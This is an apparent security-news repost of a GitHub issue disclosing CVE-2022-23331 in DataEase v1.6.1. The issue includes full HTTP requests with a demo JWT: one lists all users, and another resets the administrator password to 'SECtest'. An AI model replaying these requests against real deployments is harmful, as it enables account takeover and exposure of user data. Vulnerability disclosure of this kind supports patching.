Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23331: Security Issues[Bug] · Issue #1618 · dataease/dataease

In DataEase v1.6.1, an authenticated user can gain unauthorized access to all user information and can change the administrator password.

CVE
#vulnerability#windows#js#auth#chrome#firefox

DataEase 版本
v1.6.1

浏览器版本
Chrome 96.0.4664.110

Bug 描述
I found an Broken Access Control vulnerability
An authenticated user can access information about all users and change admin password

Bug 重现步骤(有截图更好)

  1. use demo login
  2. this api access information about all users
    ···
    POST /api/user/userGrid/1/10 HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, /
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 13

{"orders":[]}
···

  1. this api change admin password
    ···
    POST /api/user/adminUpdatePwd HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, /
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 36

{"userId":1,"newPassword":"SECtest"}
···

now you can use admin/SECtest login

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907